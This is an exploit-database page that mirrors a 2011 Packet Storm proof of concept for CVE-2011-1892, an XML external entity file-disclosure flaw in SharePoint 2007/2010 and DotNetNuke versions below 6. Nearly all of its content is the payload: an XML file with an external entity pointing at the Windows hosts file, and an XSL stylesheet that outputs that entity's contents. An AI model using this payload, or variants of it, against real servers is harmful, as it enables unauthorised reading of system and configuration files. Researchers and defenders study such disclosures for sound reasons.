Sploitus

Exploit for SharePoint 2007 / 2010 And DotNetNuke File Disclosure

packetstorm · 2011-09-21

Exploit Code

MARKDOWN22 lines
## https://sploitus.com/exploit?id=PACKETSTORM:105253
Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke  
Date: September 15, 2011  
Author: Nicolas Gregoire  
Version: SharePoint 2007 / 2010, DotNetNuke < 6  
CVE : CVE-2011-1892  
  
poc filename: xee.xml  
  
<!DOCTYPE doc [  
<!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts">  
]>  
<doc>&boom;</doc>  
  
poc filename: xee.xsl  
  
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">  
<xsl:template match="/">  
<xsl:apply-templates/>  
<xsl:value-of select="doc"/>  
</xsl:template>  
</xsl:stylesheet>